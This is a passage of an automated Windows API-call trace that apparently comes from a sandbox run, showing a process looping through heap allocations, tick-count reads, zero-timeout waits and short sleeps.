returned 0x2174d10 [0189.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0189.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.443] GetTickCount () returned 0x21755a6 [0189.443] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0189.443] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.443] GetTickCount () returned 0x21755a6 [0189.443] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.443] GetTickCount () returned 0x21755a6 [0189.443] GetTickCount () returned 0x21755a6 [0189.443] GetTickCount () returned 0x21755a6 [0189.443] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.443] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.443] GetTickCount () returned 0x21755a6 [0189.443] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.443] GetTickCount () returned 0x21755a6 [0189.443] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.443] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0189.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.446] GetTickCount () returned 0x2175e4b [0189.446] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0189.446] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.446] GetTickCount () returned 0x2175e4b [0189.447] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.447] GetTickCount () returned 0x2175e4b [0189.447] GetTickCount () returned 0x2175e4b [0189.447] GetTickCount () returned 0x2175e4b [0189.447] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.447] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.447] GetTickCount () returned 0x2175e4b [0189.447] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0189.447] GetTickCount () returned 0x2175e4b [0189.447] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0189.447] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0189.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.450] GetTickCount () returned 0x21766e1 [0189.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0189.450] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.450] GetTickCount () returned 0x21766e1 [0189.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.450] GetTickCount () returned 0x21766e1 [0189.450] GetTickCount () returned 0x21766e1 [0189.450] GetTickCount () returned 0x21766e1 [0189.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.450] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.450] GetTickCount () returned 0x21766e1 [0189.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.450] GetTickCount () returned 0x21766e1 [0189.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0189.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.454] GetTickCount () returned 0x2176f77 [0189.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0189.454] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.454] GetTickCount () returned 0x2176f77 [0189.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.454] GetTickCount () returned 0x2176f77 [0189.454] GetTickCount () returned 0x2176f77 [0189.454] GetTickCount () returned 0x2176f77 [0189.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.454] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.454] GetTickCount () returned 0x2176f77 [0189.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.455] GetTickCount () returned 0x2176f77 [0189.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0189.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.457] GetTickCount () returned 0x217780d [0189.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0189.457] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.457] GetTickCount () returned 0x217780d [0189.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.458] GetTickCount () returned 0x217780d [0189.458] GetTickCount () returned 0x217780d [0189.458] GetTickCount () returned 0x217780d [0189.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.458] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.458] GetTickCount () returned 0x217780d [0189.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.458] GetTickCount () returned 0x217780d [0189.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0189.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.462] GetTickCount () returned 0x21780b3 [0189.462] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.462] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.462] GetTickCount () returned 0x21780b3 [0189.462] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.462] GetTickCount () returned 0x21780b3 [0189.462] GetTickCount () returned 0x21780b3 [0189.462] GetTickCount () returned 0x21780b3 [0189.463] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.463] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.463] GetTickCount () returned 0x21780b3 [0189.463] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.463] GetTickCount () returned 0x21780b3 [0189.463] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.463] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.465] GetTickCount () returned 0x2178949 [0189.465] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0189.465] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.465] GetTickCount () returned 0x2178949 [0189.466] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.466] GetTickCount () returned 0x2178949 [0189.466] GetTickCount () returned 0x2178949 [0189.466] GetTickCount () returned 0x2178949 [0189.466] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.466] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.466] GetTickCount () returned 0x2178949 [0189.466] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.466] GetTickCount () returned 0x2178949 [0189.466] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.466] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0189.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.470] GetTickCount () returned 0x21791df [0189.470] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64df0 [0189.470] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.470] GetTickCount () returned 0x21791df [0189.470] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.470] GetTickCount () returned 0x21791df [0189.470] GetTickCount () returned 0x21791df [0189.470] GetTickCount () returned 0x21791df [0189.471] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.471] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.471] GetTickCount () returned 0x21791df [0189.471] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.471] GetTickCount () returned 0x21791df [0189.471] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.471] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64df0 | out: hHeap=0x2150000) returned 1 [0189.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.474] GetTickCount () returned 0x2179a75 [0189.474] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0189.474] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.474] GetTickCount () returned 0x2179a75 [0189.474] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.474] GetTickCount () returned 0x2179a75 [0189.474] GetTickCount () returned 0x2179a75 [0189.474] GetTickCount () returned 0x2179a75 [0189.474] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.474] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.474] GetTickCount () returned 0x2179a75 [0189.474] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.474] GetTickCount () returned 0x2179a75 [0189.474] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.474] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0189.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.477] GetTickCount () returned 0x217a31a [0189.477] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0189.477] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.477] GetTickCount () returned 0x217a31a [0189.478] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.478] GetTickCount () returned 0x217a31a [0189.478] GetTickCount () returned 0x217a31a [0189.478] GetTickCount () returned 0x217a31a [0189.478] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.478] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.478] GetTickCount () returned 0x217a31a [0189.478] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.478] GetTickCount () returned 0x217a31a [0189.478] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.478] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0189.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.481] GetTickCount () returned 0x217abb0 [0189.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0189.481] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.481] GetTickCount () returned 0x217abb0 [0189.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.481] GetTickCount () returned 0x217abb0 [0189.481] GetTickCount () returned 0x217abb0 [0189.481] GetTickCount () returned 0x217abb0 [0189.481] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.481] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.481] GetTickCount () returned 0x217abb0 [0189.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.481] GetTickCount () returned 0x217abb0 [0189.481] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.481] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0189.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.487] GetTickCount () returned 0x217b446 [0189.487] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0189.487] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.487] GetTickCount () returned 0x217b446 [0189.487] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.487] GetTickCount () returned 0x217b446 [0189.487] GetTickCount () returned 0x217b446 [0189.487] GetTickCount () returned 0x217b446 [0189.487] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.487] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.487] GetTickCount () returned 0x217b446 [0189.487] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.487] GetTickCount () returned 0x217b446 [0189.487] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.487] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0189.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.490] GetTickCount () returned 0x217bcdc [0189.490] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d30 [0189.490] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.490] GetTickCount () returned 0x217bcdc [0189.490] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79770 [0189.490] GetTickCount () returned 0x217bcdc [0189.490] GetTickCount () returned 0x217bcdc [0189.490] GetTickCount () returned 0x217bcdc [0189.490] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79770 | out: hHeap=0x2150000) returned 1 [0189.490] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.490] GetTickCount () returned 0x217bcdc [0189.490] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.490] GetTickCount () returned 0x217bcdc [0189.490] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.490] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0189.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.493] GetTickCount () returned 0x217c582 [0189.493] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0189.493] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.493] GetTickCount () returned 0x217c582 [0189.494] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.494] GetTickCount () returned 0x217c582 [0189.494] GetTickCount () returned 0x217c582 [0189.494] GetTickCount () returned 0x217c582 [0189.494] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.494] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.494] GetTickCount () returned 0x217c582 [0189.494] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.494] GetTickCount () returned 0x217c582 [0189.494] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.494] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0189.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.555] GetTickCount () returned 0x217ce57 [0189.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.555] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.555] GetTickCount () returned 0x217ce57 [0189.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd470 [0189.555] GetTickCount () returned 0x217ce57 [0189.555] GetTickCount () returned 0x217ce57 [0189.555] GetTickCount () returned 0x217ce57 [0189.556] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acd470 | out: hHeap=0x2150000) returned 1 [0189.556] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.556] GetTickCount () returned 0x217ce57 [0189.556] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accbd0 [0189.556] GetTickCount () returned 0x217ce57 [0189.556] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32accbd0 | out: hHeap=0x2150000) returned 1 [0189.556] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.641] GetTickCount () returned 0x217d73b [0189.642] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.642] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.642] GetTickCount () returned 0x217d73b [0189.642] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acde00 [0189.642] GetTickCount () returned 0x217d73b [0189.642] GetTickCount () returned 0x217d73b [0189.642] GetTickCount () returned 0x217d73b [0189.642] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acde00 | out: hHeap=0x2150000) returned 1 [0189.642] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.642] GetTickCount () returned 0x217d73b [0189.642] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdb90 [0189.642] GetTickCount () returned 0x217d73b [0189.642] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acdb90 | out: hHeap=0x2150000) returned 1 [0189.642] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.689] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.733] GetTickCount () returned 0x217e02e [0189.733] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d30 [0189.733] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.733] GetTickCount () returned 0x217e02e [0189.733] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf5a0 [0189.733] GetTickCount () returned 0x217e02e [0189.733] GetTickCount () returned 0x217e02e [0189.733] GetTickCount () returned 0x217e02e [0189.733] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf5a0 | out: hHeap=0x2150000) returned 1 [0189.738] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.738] GetTickCount () returned 0x217e02e [0189.739] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf7e0 [0189.739] GetTickCount () returned 0x217e02e [0189.739] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf7e0 | out: hHeap=0x2150000) returned 1 [0189.739] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0189.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.854] GetTickCount () returned 0x217e941 [0189.854] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0189.854] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.854] GetTickCount () returned 0x217e941 [0189.854] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.854] GetTickCount () returned 0x217e941 [0189.854] GetTickCount () returned 0x217e941 [0189.854] GetTickCount () returned 0x217e941 [0189.854] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.854] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.854] GetTickCount () returned 0x217e941 [0189.854] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.854] GetTickCount () returned 0x217e941 [0189.854] GetTickCount () returned 0x217e941 [0189.854] GetTickCount () returned 0x217e941 [0189.854] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.854] GetTickCount () returned 0x217e941 [0189.854] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf510 [0189.854] GetTickCount () returned 0x217e941 [0189.854] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf510 | out: hHeap=0x2150000) returned 1 [0189.854] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0189.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.901] GetTickCount () returned 0x217f206 [0189.901] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0189.901] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.901] GetTickCount () returned 0x217f206 [0189.901] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfae0 [0189.901] GetTickCount () returned 0x217f206 [0189.901] GetTickCount () returned 0x217f206 [0189.901] GetTickCount () returned 0x217f206 [0189.901] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfae0 | out: hHeap=0x2150000) returned 1 [0189.901] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.901] GetTickCount () returned 0x217f206 [0189.901] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf4e0 [0189.901] GetTickCount () returned 0x217f206 [0189.901] GetTickCount () returned 0x217f206 [0189.901] GetTickCount () returned 0x217f206 [0189.901] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf4e0 | out: hHeap=0x2150000) returned 1 [0189.901] GetTickCount () returned 0x217f206 [0189.901] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0189.901] GetTickCount () returned 0x217f206 [0189.902] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0189.902] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0189.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.930] GetTickCount () returned 0x217fabc [0189.930] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64df0 [0189.930] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.930] GetTickCount () returned 0x217fabc [0189.930] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf4e0 [0189.930] GetTickCount () returned 0x217fabc [0189.930] GetTickCount () returned 0x217fabc [0189.930] GetTickCount () returned 0x217fabc [0189.930] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf4e0 | out: hHeap=0x2150000) returned 1 [0189.930] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.930] GetTickCount () returned 0x217fabc [0189.930] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.930] GetTickCount () returned 0x217fabc [0189.930] GetTickCount () returned 0x217fabc [0189.930] GetTickCount () returned 0x217fabc [0189.930] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.930] GetTickCount () returned 0x217fabc [0189.930] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.930] GetTickCount () returned 0x217fabc [0189.930] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.930] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64df0 | out: hHeap=0x2150000) returned 1 [0189.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) 